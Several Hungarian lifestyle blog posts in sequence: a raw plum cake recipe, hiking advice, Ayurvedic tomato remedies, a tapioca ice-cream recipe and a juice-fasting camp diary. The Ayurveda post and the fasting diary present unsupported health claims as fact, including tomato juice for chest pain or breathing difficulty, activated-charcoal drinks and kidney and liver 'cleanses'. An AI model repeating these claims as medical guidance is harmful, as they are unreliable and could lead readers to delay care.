Miért együnk / készítsünk nyers süteményt? Sok rost tartalma és a benne lévő természetes cukortartalma miatt egészségesebb édesség források. Mazsolának/datolyának köszönhetően édes finomság, cukor hozzáadása nélkül. Mivel nem kerül sor hevítésre, vitaminokban, ásványi anyagokban és enzimekben gazdag édességről van szó. Azért fontosak az enzimeket a nyers ételek által a szervezetbe juttatni, mert jó emésztést és anyagcserét biztosítanak. Lehetővé teszik a tápanyagok (vitaminok, nyomelemek, ásványi anyagok, fehérjék, szénhidrátok, zsírok és olajok) szervezetbe kapcsolását. Hőkezelés hatására azonban (kb. 55°C fok felett) lebomlanak, és ezek hiányában a különböző tápanyagok vagy nem is hasznosulnak, vagy a szervezet saját tartalékaiból kell a szükséges enzimeket előállítania (ami például a hasnyálmirigy természetellenes túlterheléséhez vezet).
A recept
A desszert alapja
Hozzávalók:
- kb. 2-3 nagyobb bögre olajos magvak, mogyorófélék (pl.dió, lenmag, mogyoró)
- datolya és/vagy mazsola
- víz
Elkészítés:
Az olajos magvakat és mogyoróféléket külön külön jó alaposan megdaráljuk pl. kávédarálóval. A datolyát felaprítjuk, meleg vízbe beáztatjuk, majd ha felpuhult, a vizet leszűrjük róla és gyorsraprító gépben pépesre daráljuk. Ha csak mazsolával dolgozunk, azt is beáztatjuk, hogy felpuhuljon, majd a vizet leszűrjük róla és hozzákeverjük a mag őrleményhez. Egy kevés vizet adunk még hozzá, ha szükséges ahhoz, hogy egy nagy gombócot tudjunk formálni ebből a masszából. Ha csak egy fajta mogyoró/diófélével dolgozunk, akkor úgy is elkészíthetjük, hogy először nagyjából összeaprítjuk a géppel a mogyoró/diófélét, majd hozzáadjuk a megáztatott datolyát/mazsolát és tovább őröljük az aprító géppel addig, míg eggyé tapad össze.
Egy tortaformát vagy egy tepsit és folpackkal kibélelelünk és az aljába nyomkodjuk a nyers tésztát. Hűtőbe tesszük, míg a másik két krém elkészül.
A szilvás krém receptje
Hozzávalók:
- 2-3 bögrényi nagyon érett szilva (fagyasztott is lehet)
(Bármelyik fajta barack jó: besztercei, ringló, president, stanley stb.)
- meleg vízben áztatott datolya (kb 1/2 bögrényi)
- max. 1 dl víz
- 4-5 ek útifűmaghéj
Elkészítés:
Vegyük elő a turmixgépet (vagy egy erős aprítógépet) és a fentieket az útifűmaghéj kivételével tegyük bele. Indítsuk el, és ha a szilvából szilvaszósz lett, akkor kb 4-5 evőkanálnyi útifűmaghéjjal is turmixoljuk össze. Hagyjuk állni. Nagyjából negyed óra múlva kenhető állagú krém lesz belőle. Ha nem elég szilárd ahhoz, hogy kenni tudjuk, még némi útifűmaghéjat keverjünk hozzá (fakanállal is átkeverhető). A kész krémet egyszerűen elkenjük az őrölt magokból készült tésztán. Hűtőben tároljuk további munkálatokig.
A világosabb hab receptje
Hozzávalók:
- 1/2 bögrényi dióféle vagy mogyoróféle
- 1/2 bögrényi meleg víz
- 1-2 ek áztatott mazsola vagy datolya
- 1 ek útifűmaghéj
- 1/2-1 bögre magozott szilva
Elkészítés:
A diófélét és a mazsolát beleszórjuk a turmix gépbe (ha van lehetőségünk a diófélét előáztatni, még jobb), meleg vizet öntünk rá és összeturmixoljuk. Hamar egy tejföl-szerű állagot kell kapjunk. Ehhez turmixoljuk a szilvát. Végül hozzáadunk kb. 1 ek útifűmaghéjt, átkeverjük, majd a sütemény tetejére simítjuk.
Végső műveletként szilvakarikákkal vagy fél szilvaszeletekkel diszítjük. Tálalásig hűtőben tároljuk.
Hogyan kezdj neki az erdőjárásnak? - jó tanácsok kiránduláshoz, túrázáshoz
2018. augusztus 29. Élj harmóniában
Az ember mindig is része volt a természetnek, elválaszthatatlanok vagyunk egymástól. A régi korok embere sokkal inkább összhangban élt a természettel, mint a mostani modern kori ember. Igazi belső harmóniát csak olyan közegben tudsz tapasztalni, ami maga is harmonikus. A városi forgatag sajnos nélkülöz minden harmóniát, ezért a városi emberek tapasztalják is magukon a felpörgetettséget, nyugtalanságot, túl sok gondolatot, túl sok fizikai aktivitást. Amikor körülötted nincs harmónia, akkor Neked is nélkülöznöd kell a harmóniát. A legideálisabb közeg éppen ezért az, amikor a természetben vagyunk. Megfigyelted már az elméd mennyivel békésebb, amikor éppen kirándulsz egy erdőben? Ha egy békés, nyugodt környezetben vagy, akkor az elméd is békésebbé, nyugodtabbá válik. A harmónián túl nagyon fontos az is, hogy milyen az életenergia szinted. Észrevetted már, hogy amikor egész nap kint vagy a szabadban pl. erdőben kirándulsz vagy akárcsak egy kertben üldögélsz kevésbé merül ki a szervezeted és nyugodtabb vagy, mint amikor egész nap ülsz egy levegőtlen, napfény nélküli irodában? Pránával (életenergiával vagy ahogy a kínaiak mondják chi-vel ) a legkönnyebben úgy tudod feltölteni a szervezetedet, ha kimész a természetbe, erdőkön, mezőkön sétálsz. Minél távolabb vagy a világi nyüzsgéstől, annál inkább tudsz töltődni . Szeptemberben az időjárás még nagyon kellemes ahhoz, hogy sok időt tölts a szabadban. Arról, hogyan növelheted az életenergia szinted egy korábbi bejegyzésben már részletesen írtam itt olvashatod. A japánok évek óta kutatják az általuk "erdőfürdőzésnek" hívott jelenség hatásait az emberi szervezetre. Számos kutatásuk támasztja alá, hogy az erdőben eltöltött néhány óra sétálgatás után normalizálódik a keringés, a légzés. Erről részletesebben a hvg oldalán olvashatsz egy cikket itt. Ugyan jómagam pici gyerekkorom óta járom az erdőket, nagyon régóta túrázok, kirándulok, sok mindent rutinból csinálok, de itt is nagyon fontos a tudatosság. Néha látok olyanokat, akik valami kis strandpapucsban, szandálban elindulnak kirándulni és mennek csak úgy minden nélkül felfelé egy sziklás hegyoldalban - az erdőben nem lesz minden harmadik sarkon egy benzin kút vagy mini ABC - sajnos ez nagyon kockázatos és balesetveszélyes. Ha nem készülsz fel tudatosan egy túrára, könnyen lehet, hogy a remélt csodás élmény helyett, egy rakat maradandó rossz élménnyel térsz haza - eltévedés, időjárási szélsőségek (elázás, leégés, hőguta) , feltört láb, sérülések, kiszáradás miatti kimerültség, éhség, ingerültség, feszültség, esetleg fájdalmak vagy rettenetes izomláz, szétszakadt ruha, etc. Sokszor derült már ki számomra, hogyan sokan nem annyira tájékozottak abban, mivel, hogyan érdemes készülni egy kirándulásra, túrára. Régóta tervezek egy bejegyzést a témában íme, megszületett. Nagy szeretettel próbáltam összefoglalni mindent, ami a túrázáshoz, kiránduláshoz szükséges - útvonal, ruházat, lábbeli, hátizsák, étel-ital, etc.. Ezzel a bejegyzéssel abban szeretnék segíteni neked, ha kedvet kapnál egy kis kiruccanáshoz a természetbe, egy kis kiránduláshoz, túrázáshoz, akkor ennek hogyan kezdj neki. A kirándulás jó dolog és sokan kirándulnak, de nem árt erre is tudatosan felkészülni. Van néhány apróság, amire ha figyelsz, sokat segíthet abban, hogy a kirándulás élvezetes legyen, igazi élmény és teljesen fel tudj töltődni. Túraútvonal Jó, ha előre megtervezed a fizikumodnak és a társaid állapotának megfelelően, milyen útvonalon fogsz haladni, utánanézel az mennyire könnyű vagy nehéz terep, hány km és mennyi időt vesz igénybe. Az interneten sokfelé találhatsz komplett útvonal ajánlatokat - a jövőben tervezek én is komplett túra útvonalakat közzétenni. Fontos, hogy szerezz be a tervezett útvonalhoz egy megfelelő aktuális turista térképet. Az erdőkben nagyon sokfelé vannak útvonalak, elágazások és nem mindig egyértelmű merre kell továbbhaladni, ezért jó, ha van nálad egy térkép. A túra útvonalakat sokszor módosítják, alakítják, ezért a legjobb, ha a legaktuálisabb térképpel vágsz neki a túrának. Előre tervezd meg azt is, hogy a túra kiindulási pontját, hogyan tudod jól megközelíteni és visszafelé az érkezési ponttól hogyan jutsz majd haza. Nézd meg és írd fel magadnak a busz és vonat menetrendeket. Ne felejtsd el magaddal vinni a BKV bérletedet is, mert az Budapest közigazgatási határáig érvényes. Érdemes a túrázás előtt megnézni milyen időjárás várható azon a környéken. Ha nagyon rossz időt jósolnak, hatalmas viharokat, akkor inkább tegyétek át a túrát másik napra. Ruházat Válassz jól szellőző, ellenálló anyagból készült kényelmes ruházatot. Öltözz rétegesen - az erdőben általában jóval hűvösebb van. Akár egy adott túrán belül is változhat az időjárás is, vagy egy hegy északi oldalán sokkal hidegebbet fogsz tapasztalni, mint a pl. a déli vagy a nyugati oldalon. Ha árkokban, szurdokban mész teljesen más lesz a hőérzeted, mint pl. a hegygerincen. A nadrágnál jó, ha hosszú, mert védi a lábad, de nyári hőségben ideálisak a variálható, felhajtható, lezipzárazható nadrágok. Ha nagyon nagy a hőség, ideális lehet a rövidnadrág is annak érdekében, hogy ne izzadj be. Érdemes magaddal vinni hosszú ujjút - még a legmelegebb nyárban is van nálam hosszú ujjú póló. Ha hűvösebb az időjárás jó, ha van nálad polár vagy valami melegebb pulóver - én szeretek mellényt is hordani hűvösben, mert az is jól variálható. Komolyabb, hideg időjárásban pedig elengedhetetlen a kabát. Nálam mindig van a zsák aljában egy pici helyet foglaló esőkabát és a hátizsákomra egy esővédő - ha egyszer csak elered, ezek nagyon jó szolgálatot tesznek. Kislány korom óta nem nagyon megyek kirándulni kendő és sapka nélkül sem. Részben mert a tested hőjének jelentős része a fejeden távozik, így ha a fejed nincs fedve, könnyen lehet, hogy fázni fogsz. A másik dolog, hogy Édesapám mindig mondta, hogy a sapka fontos - így nem esnek a fejemre mindenféle dolgok fentről, nem másznak be a bogarak a hajamba és az esetleges pókhálókon is könnyedebb az átjutás:) Végezetül pedig néhány szó a zokniról. Soha ne vágj neki egy túrának valami olcsó, egyszerű vékony kis pamut zokniban, mert hosszú időre szerezhetsz bőrsérüléseket, szép nagy vízhólyagokat. Egy jó túra zokni eleve biztosítja, hogy ne nagyon törje fel a lábad a cipő, valamint elvezeti a nedvességet, nem mozog el a lábadon túra közben. Ideális a gyapjú és szintetikus anyagok keverékéből készített túra zokni, a lábbelidhez igazítva - pl nyári túracipőhöz más zoknira lesz szükséged, mint egy téli túrabakancshoz, etc.. Lábbeli A túrázás legfontosabb kelléke a megfelelő cipő kiválasztása. Sokszor látok nyáron kirándulókat, akik pl megálltak a Hármashatárhegynél vagy Dobogókőnél és egy könnyű kis hétköznapi szandálban vagy akár strandpapucsban vágnak neki a környező útvonalaknak. A nem megfelelő lábbeli nem csak hogy kényelmetlen lesz, de balesetveszélyes is. Nagyon fontos, hogy a túrázáshoz használt cipő jól tartsa a lábad, jól tapadjon, könnyű és kényelmes legyen. A hazai terepeken ideális, ha rugalmasabb talpú cipőt választasz. A legtöbben nem tudják, de a nagyon profi stramm kinézetű túrabakancsok legnagyobb része magashegységekhez van kitalálva, nagyon merev a talpuk, ezáltal ideálisak sziklás talajhoz. A hazai kiránduló útvonalakhoz nem jó egy túl merev talpú, nehéz bakancsot választani, mert csak fájni fog a lábad benne. A túrabakancs, túracipő, trekkingcipő kiválasztásnál a legfontosabb szempont a kényelem. Ne felejtsd el, hogy minimum 1 számmal nagyobb lábbelit vegyél, mert ha éppen jó rád a túrabakancs, akkor főleg ha már délutánra bedagadt a lábad, hegyről lefelé jövet elképzelhető, hogy sérülni fog a lábujjad. Én a Salomon túracipőire esküszöm, mert évtizedek óta ezzel foglalkoznak, nagyon kényelmesek, könnyűek, strapabíróak és még egyikről sem hallottam, hogy bárkinek feltörte volna a lábát:) Nyáron érdemes nyári túracipőt választani, ami jól szellőzik. Ősszel és tavasszal jó, ha vízálló bakancsot választasz. Téli túrákhoz, pedig ideálisak a bélelt meleg bakancsok. Mielőtt túrázni indulsz, győződj meg arról is, hogy a lábkörmeid elég rövidek-e. A hosszú lábköröm komolyan meg tud nyomódni és nagy fájdalmakat tud okozni. Lehetőleg ne közvetlenül túra előtt vágj körmöt, mert ha esetleg megsérül a lábat, akkor fájdalmas lesz a túra alatt. Néhány nappal a túrázás előtt érdemes időzíteni a körömvágást, így ha esetleg valami sérülés keletkezik, lesz ideje begyógyulni. Étel és ital Klastrom-forrás (Klastromkút) Egy kirándulás elképzelhetetlen megfelelő folyadék és élelmiszer utánpótlás nélkül. Gondold át előre, mekkora távra mész, mennyi ideig fogsz túrázni, lesz-e közben vízvételi lehetőség ( pl. források, falvak). Ha melegebb nyári időjárás van, azt is kalkuláld bele, hogy sokkal több folyadékra lesz a szervezetednek szüksége. A túra során igyál rendszeresen. Sokan csak azért fáradnak el gyaloglás közben, mert nem ittak eleget. A folyadék utánpótlására a legideálisabb a tiszta minőségű víz - hűvösebb időjárásban pedig az, ha termoszban gyógyteát, fűszeres teákat viszel magaddal. Divatosak az ilyen mindenféle izotóniás italok - akik ismernek, tudják, hogy távol tartom magam a műdolgoktól. Lehet, hogy jók, de majd beszélgetek azokkal, akik ezeket isszák 40 év múlva, hogy vannak:) Élelmiszernek olyat csomagolj, ami nem romlik - ideális ilyenkor a hús és tejtermékmentes étrend. Egy tökmagkrémes szendvics a nagy melegben kevésbé romlandó, mint egy sajtos vagy sonkás szendvics. Mi túra előtt, általában frissen főzünk gabonából és hüvelyesből készült ételt zöldségekkel (pl rizs, dhál, subji) és dobozban visszük magunkkal. Van, amikor pogácsát vagy muffint sütök az útra. Ezen felül mindig van nálunk valamilyen müzli szelet féle, szezámszelet, aszalt gyümölcsök, magvak. Jó lehet ilyenkor a keksz, a sós ropi, sokan szeretnek csokoládét vinni, mert kevés helyet foglal és sok kalóriát ad - nyáron a hőségben a csokit nem ajánlom, mert elolvad:) Vihetsz magaddal almát is - folyósabb gyümölcsöket nem ajánlom kiránduláshoz. Jó, ha van nálad valamilyen cukor, amivel gyorsan energiához juttathatod a szervezetedet. Hátizsák Ne túl nagy méretű és könnyű túrazsákot válassz. Érdemes egy jó túrazsákot beszerezni, mert egy kis háti tarisznyában elfér mindened, de ha kényelmetlen a hátadon, akkor a túra élményéből sokat el fog venni. Mindent a hátizsákba tegyél, nem érdemes külön keresztbe kis táskát, oldaltáskát vinni magadon, mert csak nehezíti a közlekedést és adott esetben balesetveszélyes is lehet, ha beakad valahová. Vigyél magaddal mindent, ami szükséges, de itt is érvényes jóga elve aparigraha - ne birtokolj a szükségesnél többet. Ne tedd tele a zsákodat fölösleges dolgokkal, amik csak foglalják a helyet és plusz súlyt jelentenek végig a túra alatt. Legyen nálad minden, ami kell és minél könnyebb a hátizsákod, annál könnyebben tudsz majd vele gyalogolni. Néhány apróság, amik nélkül én nem szoktam útra kelni Legyen nálad elegendő papír zsebkendő, vagy akár külön wc papír is. Az erdőben ne keres nyilvános wc-t, csak keress egy számodra szimpatikus helyet, bokrot. Hasznos, ha van egy iránytűd, segít tájékozódni, hogy a térképen mikor merre mi találhatóJ Ha nyári hőségben mész kirándulni - és nem végig erődben leszel - érdemes naptejet használni, nehogy megégj. Ha szeretnél fényképeket készíteni, akkor legyen nálad fényképezőgép vagy a telefonod. Bicska, zsebkés - ideális, ha le kell valamiből vágni valamit, vagy egy botot szeretnél magadnak a kiránduláshoz helyben készíteni. Amennyiben többfunkciós, pl a rajta lévő nagyító szuper a térképen található apró részletek megtekintéséhez. Toll, papír - szeretem ha vannak nálam. Részben bármikor lehet, hogy valahol találsz olyan kiírást, amiből valamit le szeretnél írni, vagy jön egy jó ötlet vagy valakitől hallasz valamit, amit jó lenne megörökíteni. Ha szükséged van szemüvegre pl távollátáshoz feltétlenül vidd magaddal - elszomorító, ha azért maradsz le a csodás panorámáról, mert otthonfelejtetted. Érdemes vinni a hátizsákban egy váltó zoknit is magaddal. Célszerű valamennyi kis egészségügyi csomagot vinni magaddal. Én ebbe nem vagyok túl erős, nálam csak néhány ragtapasz van:) de mindig tervezek venni egy jó kis elsősegély csomagot. A túrabot is sokaknak nyújt segítséget - pl. 82 éves Édesapám naponta járja az erdőket, de egy lépést sem tenne a botja nélkül. Neki még klasszikus túrabotja van, ami a Nagypapámé volt, tele jelvényekkelJ Ha úgy érzed, neked hasznos lehet egy jó kis bot, szerezz be egyet. Én nem használom, mert zavar, hogy nem szabad a kezem - ha nagyobb a testsúlyod, gond van az ízületeiddel vagy idősebb vagy, akkor mindenképpen jó dolog. Amennyiben a szemed érzékeny a fényre és a túra egy része olyan szakaszon halad, akkor feltétlenül vigyél magaddal napszemüveget. Ha egész napos túrát tervezel és van rá esély, hogy sötétedni kezd, mindenképpen legyen nálad lámpa. Én fejlámpát hordok magamnál, mert biztonságosabb, így a kezeimet bármikor könnyedén tudom használni pl. kapaszkodásra, de egy kézi elemlámpa is jó. Néhány jó tanács az erdőjáráshoz Ne szemetelj. Mindig vidd haza magaddal azt, amit elvittél az útra, ne dobálj szét az erdőben semmit. Mi a szemetet külön kis zacskóba szoktuk gyűjteni a hátizsák oldalsó zsebében. Az erdőben ne rohanj, élvezd a természet csodáit. Nyugodtan állj meg egy-egy csodát nyújtó szépségnél, pihenj meg, ha elfáradtál. Ne legyél teljesítmény kényszeres, ne a rohanásról szóljon az erdőjárás. Gyűjtsd az élményeket, élvezd a szépet és mindazt, ami gyönyörködteti a szíved, a szemed és a lelked. Az erdő megannyi élőlény otthona. Ezt mindig tartsd tiszteletben, légy kedves, illedelmes vendég. Ne hangoskodj, lehetőleg ne zavard meg az ott élő élőlények nyugalmát. Ne piszkáld, zaklasd, bántsd az utadba kerülőket - pl bogarakat, pókokat, növényeket, etc. A növények csodaszépek természetes élőhelyükön, ne bántsd, ne tépd le őket. Ha bárkivel találkozol az erdőben légy kedves, udvarias. Én mindig, mindenkinek szoktam köszönni. Ha valaki bajba kerül, mindig légy segítőkész. Erdőben tilos tüzet gyújtani, kivétel az erre kijelölt helyeken. Kerüld a tűzgyújtást az erdőben - még a kijelölt helyeken is. Ha feltétlenül szükséges szigorúan tartsd be a tűzgyújtás szabályait. http://erdotuz.hu/tuzgyujtasi-szabalyok/ Ha bármi baj történik, próbálj nyugodt maradni. Tudatosan gondold át, mit kell tenned, kérj segítséget, hívd a szükséges hatóságokat. A mértékletességet, fokozatosságot itt se felejtsd el, ne akarj első nagyon nagy távot, nehéz hátizsákkal megtenni. Kezd egy kisebb terheléssel, és ahogy a szervezeted szépen kezd hozzászokni a kilométerekhez és a zsákcipeléséhez úgy tudsz majd nagyobb távokat megtenni. Ne felejtsd el, a kirándulás, túrázás lényege, hogy szép és kellemes élményeid legyenek, hogy békéssé váljon az elméd, hogy közelebb kerülj a természethez és hogy pránával töltsd fel a szervezeted, nem pedig az, hogy valami távot, km-t, hegycsúcsot teljesíts vagy kitegyél valami postot egy közösségi média oldalára. Örömteli kirándulást kívánok:) szeretettel Kati
A paradicsom hatásai és ájurvédikus alkalmazása
2018. augusztus 20. Élj harmóniában
A paradicsom egész nyáron át felelhető a kiskertekben és a zöldségárusoknál. Sokan még erkélyládákban is termesztik a kislakásokban. A paradicsom a burgonyafélék (csucsorfélék) családjába tartozik. Lehet zöld, sárga vagy piros színű. Számos formában is fellelhető. Az ájurvéda szempontjából a zöld és a sárga savanyú, édes és fűtő hatású, csípő utóhatással. Mindhárom doshát emelik. A piros színű paradicsom savanyú, édes és csípős hatással rendelkezik. A gyomorban hűsítő hatása van, de a belekben kifejezetten fűtő hatású. A piros színű paradicsom nyersen mindhárom doshát növeli. Bár az ájurévda úgy gondolja a paradicsom általában véve nagyon toxikus a szervezet számára - az nem okoz gondot, ha valaki néha, néha elfogyaszt egy kis paradicsomot, feltéve, ha meg van főzve és megfelelően fűszerezve, olyan fűszerekkel, mint a római kömény, kurkuma, fekete mustármag . A paradicsom fogyasztása nagyon nem jó savasodáskor, vese és epekő esetén, ízületi gyulladás és isiász esetén. A nyers paradicsom magjai alhasi fájdalmat okozhatnak. Néhány ájurvédikus alkalmazási mód: Mivel a húsokat nehéz megemészteni, ezért emésztés segítésére húsos étel fogyasztása után 1 órával próbálj inni 1 csésze paradicsomlevet egy csipet őrölt római kömény porral. Emésztési probléma esetén fogyassz 1 csésze paradicsomlevet, 1/4 tk fekete borssal, egy csipet hinggel (aszafoetidával) és egy csipet kősóval. Ez sokat segíthet. Mentális fáradtság, kimerültség és álmatlanság esetén próbálj meg délután 4 és 5 óra között meginni egy csésze paradicsomlevet 2 teáskanál teljes értékű bio nádcukorral, két csipet szerecsendióval. Aztán fogyaszd el a vacsorát 6 és 7 között és aznap este aludjál többet. Ahhoz, hogy csökkentsd a zsírt és a testsúlyod, igyál egy csésze paradicsomlevet két csipet trikatuval ( ez gyömbér, fekete bors és hosszú bors keveréke) kora reggel és utána várj 2 órát mielőtt bármit ennél vagy innál. Száraz köhögés, légzési nehézség és mellkasi fájdalom esetén igyál egy csésze paradicsomlevet 1 tk. kurkumával, 2 tk, t eljes értékű bio nádcukorral és egy csipet őrölt szegfűszeggel. Ezt üres gyomorra fogyaszd el és utána egy óráig ne egyél és ne igyál semmit. Vegyszermentes (bio) paradicsomot használj! felhasznált szakirodalom: dr. Vasant Lad és Usha Lad Ájurvéda szakácskönyve
Tápiókás jégkrém
2018. augusztus 10. Kertkonyha
Mióta megvettem a spéci formákat hozzá, egyre többet kísérletezem itthon jégkrémekkel. Egyrészt őrült izgalmas dolog kigondolni, összerakni, kifagyasztani, majd végre kihúzni a formából. Másrészt finom, de nagyon! Tavaly is csináltam pár variációt, idén meg felfedeztem magamnak a tápiókát. Általában mindenféle pudingot csinálok belőle, de most jöjjön a fagyi! :)
Nem is tudom, miért vártam vele idáig, ha egyszer mindkettőt imádom. Biztos, mindennek eljön az ideje.
Szóval, itt a fúziós jégkrém, most éppen málnával, mert az a kedvencem. :)))
Persze te helyettesítheted más, könnyen törhető gyümölccsel is.
Hozzávalók 5 adaghoz:
- 20 g tápiókagyöngy
- 250 g rizstej
- bele 1 kk vaníliás cukor
- 1 csipet só
- 2 kk cukor (vagy annak megfelelő édesítő)
- 10 szem málna
- A tejbe szórd bele a tápiókát, a cukrokat, a sót, és lassú tűzön főzd 10 percig. Finoman jó kevergetni időnként, nehogy odakapjon, de vigyázz, próbáld ne nagyon törni a szemeket.
- A málnát mosd meg, és keverd a még forró pudingba. Kanállal kicsit nyomkod is szét a szemeket.
- Amikor már nem gőzölög annyira, töltsd formába, és tedd a mélyhűtőbe 2-3 órára.
Jó étvágyat!
Elkészítési idő: 10 perc
Ez egy vegán recept volt. :)
Hasonló recepteket ITT találsz még.
Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :)
Nézd meg a legújabb Kertkonyha főzőtanfolyamokat:
Kezdő Vegán
Vegán MUST HAVE - a kötelező alapcsomag
Növényi Tejek és Tejtermékek I
Növényi Tejtermékek II
A Mindennapi Superfood
Kezdő Vegán Angol nyelven
The post Tápiókás jégkrém appeared first on Kertkonyha.
Léböjt táborban jártam...
Egy hely, ahol különböző levek ivása mellett nem viszel be szilárd táplálékot, még gyümölcsöt és zöldséget sem eszel, nem rágsz semmit, és még sem vagy igazán éhes. Ez a hely az a léböjt tábor, amely a szerbiai Fekete-tó (Crna Bara) nevü településen került megrendezésre immáron sokadik alkalommal, nekem és férjemnek azonban életünk első léböjt tábora volt.
Crna Bara a falucska és a tábor, a szegénységhez közel, mégis gyümölcsözönben és emberi szeretetben bővölködő. Itt végre a civilizáció és annak ártalmai kevésbé vannak jelen, nem mérgezik a mindennapi életet. Egy hely, ahol az emberek egyszerűbben élnek, ruházkodnak, beszélnek, gondolkodnak és van értéke a kétkezi munkának, ahol a konyhakert adja az évi élelem egy nagyobb részét. Ez az a hely, ahol az ember csendben visszavonulhat, megpihenhet, feltöltődhet és új embereket ismerhet meg, gazdagodhat mások élettörténetei, tapasztalatai által.
A jelenlévő 20-25 táborozóból csak négyen voltunk, akik először jártunk itt, mert ide az emberek visszajárnak Magyarországról, Németországból, Horvátországból. Felújított, régi vályogházakban egyszerű körülmények között szállásolnak el bennünket. A lé-kínálat gazdag (korlátlan) és sokfajta, köszönhetően a környékbeli gyümölcsfáknak, kerteknek és dinnyeföldeknek. Bátran állítom, a tábor felülmúlta várakozásainkat annak ellenére, hogy még sok fejlesztendő területe van. Szívesen visszamennénk. Csendben belopta magát a szívünkbe.
Vese-, máj- és béltisztítással egybekötött léböjt tábor volt ez, ahol a béltisztítás két illetve három különböző formulával történt. Az egyik, amit napjában többször ittunk, az általunk "fekete-leves"-nek hívott aktív szén alapú por vízzel hígított itala. Ez nem csupán aktív szenet tartalmazott, hanem más egyéb dolgokat is. 1 kiskanálnyi port kb. 1.5 dl vízzel összeráztunk kis befőttes üvegben, majd mielőbb megittuk. Akik erre még ittak vizet, helyesen tették. Ez a fekete-leves a gyomorban besűrűsödött. A béltszitításhoz ezen kívül még 2 különböző kapszulát is szedtünk. Várakozással telve mentünk el ebbe a kis falucskába, nem tudva pontosan, milyen lesz a böjt, nehéz, vagy könnyű, de Eleken való évekkel ezelőtti részvételünk miatt is vágytunk arra, hogy megerősítsük immunrendszerünket, feltöltsük szervezetünket sok-sok enzimmel és az angliai életből fakadó rossz szokásoktól valamelyest könnyebb legyen megszabadulni, egy új kezdethez alapot kapni. Szervezők ajánlották, hogy az érkezés előtti napokban 80%-ban igyekezzünk nyers ételeket fogyasztani. Igyekeztünk, készítettem is nyers kenyeret és egyéb nyers ételeket, de nem kizárólagosan fogyasztottunk nyerset ekkor.
A vesetisztítás a 2-6. napban reggeli és esti teával valamint csilis-citromos limonádéval történt. Egy aprónyi mellékhatásaként a veséim tisztulásának következtében az arcbőröm reggel-este zsírosabb volt a szokásosnál (inkább száraz vagy normál az arcbőröm). Kisebb pattanások jöttek ki a hajamhoz közel körben a homlokomnál és a halántékomon. Nem nagyon foglalkoztam vele, mivel nem volt erősen zavaró egyik sem és tudtam, ha a léböjtnek vége, ezek mind elmúlnak. Így is lett.
Májtisztítás pedig a 7-11. napban történt májtisztító teával valamint grapefruit-os, fokhagymás, gyömbéres itallal. Az egyik kapszulát már nem kellett szedni. Mellékhatásként nem tudom, hogy a már 5 napja tartó böjt hatásaként vagy a májtisztítás miatt jelent-e meg, de a nyelvem már nagyon lepedékes lett. (Elvégre is a rágás hiányzott a napjainkból.) Fogkefe-fogkrém páros még gyakrabb használatával orvosoltam.
A következőkben beszámolok arról, melyik napon mi történt és hogyan éltem meg a léböjtöt.
1. nap
Belgrádból érkeztünk a táborba, egy helyi ember jött értünk és hozott el minket, mivel távolsági közlekedés nem a legjobb az országban. Az út Belgrádból kevesebb, mint 3 óra volt, nem autópályán, így láthattuk az ország bizonyos tájait.
Megérkezés után elfoglalhattuk szállásunkat, majd a regisztrációs lap kitöltése után vérnyomás, vércukor és testtömeg mérés következett. Megérkezés napján mindenki dinnyét kapott vacsorára. Mondhatnám ALL YOU CAN EAT DINNYE (Amennyi csak beléd fér dinnye.) Meglehetősen kedvemre való volt, hiszen reggel már sikerült Belgrádban is felvágnom egy dinnyét és élvezettel fogyasztottam, mivel Angliában az édes, piros belsejű dinnye ritka. (Volt már idén részem édes dinnyében Angliában, de egy kezemmel meg tudom számolni, hányszor.)
Dinnye után kb. 1-2 órával 2 különböző kapszula bevétele következett, amelyek a béltisztításért felelősek.
A léböjt tábor nem lenne igazi, ha a testi bajok gyógyítása mellett a lelki egészségre ne figyelne. Lelki táplálékként előadás 10-15 percben, majd hamarosan takarodó, 9 órakkor. Korainak találják egyesek a takarodó idejét, de emlékeztetnek arra, hogy az éjfél előtti alvás duplán számít, többet ér, mint az éjfél utáni. Nehezen alszom el.
2. nap
Ébredés 5.30 körül, kissé nehezen kelek, de egész nap energiadús vagyok. A reggeli tisztálkodást vízivás és béltisztító formula (fekete leves) bevétele követi 6 órakor, majd fél 7-kor közös reggeli torna a füvön. Szép időre ébredtünk, jól esik a reggeli torna is. Tornát követően citromos csilis shake-t ittunk, majd lelki táplálék a reggeli gondolatokkal, amit a tea követett. Napközben pedig jött a dinnyelé, paradicsomlé, zöldséglé (ezen a napon céklalé), káliumleves és tea zárta a sort. Szuper, hogy nem volt korlátozva mennyit ihatsz. Dinnyeléből le is ment legalább 1 liter. A napi ivászatokat tornával, sétákkal, kirándulással, egészségügyi előadásokkal és rövid csendes pihenőkkel tettük változatossá.
Zöldségléként a céklalé, ahogy arra számítottam, enyhe hányingert okozott. Ez tipikus, mivel volt már máskor is, amikor otthon próbáltam natúr cékla levet inni. Bár tettem bele pár csepp fokhagymalét, de nem segített. Maga a cékla leve marta a torkom, hiába ittam rá utána bőséggel vizet. Pár óra múlva jött a káliumleves (az egyetlen nem nyers alapú lé, mivel zöldségleves sómentesen, átszűrve a zöldségektől, csak maga a lé), ami a hányingeremet helyre tette valamelyest, ezért az esti tea után ismét ittam káliumlevest. Így teljesen normalizálódott a gyomrom, nem volt már estére hányingerem. A 9 órási takarodó sem okozott gondot.
3. nap
Ismét kellő energiával ébredtem. Székletem is volt már kora reggel, ébredést követően, annak ellenére, hogy nem eszünk, csak iszunk. Jól esett a reggeli torna. Nem kivántam mást csak vizet inni, azért a reggeli csilis limonádéval megpróbálkoztam, kb. 3 dl tudtam meginni ezen a reggelen.
Dél körül f utni mentem, mert hiányzott az aktivabb mozgás. Sajnos a nagy meleg miatt nem ment tovább csak kb. 15 percig. Így visszatértem, lezuhanyoztam, ami jól esett nagyon. A reggeli 3 pohár szilva hajtó hatása miatt inkább nem mentem el kirándulni a csapattal óvatosságból, de nem volt végül semmi bajom a közel 1,3 liter szilvalétől. :)
Délután uborkából és paradicsom készült a lé, ami különben egész jól esett. Nem fűszereztem se petrezselyem, se fokhagyma, se csili lével. Lágy volt, mintha símogatna.
4. nap
Enyhe izomláz éreztette magát a végtagjaimban a reggeli torna és a futás eredményeként. Ezen a napon masszázst kaptam, ami nagyon jól esett.
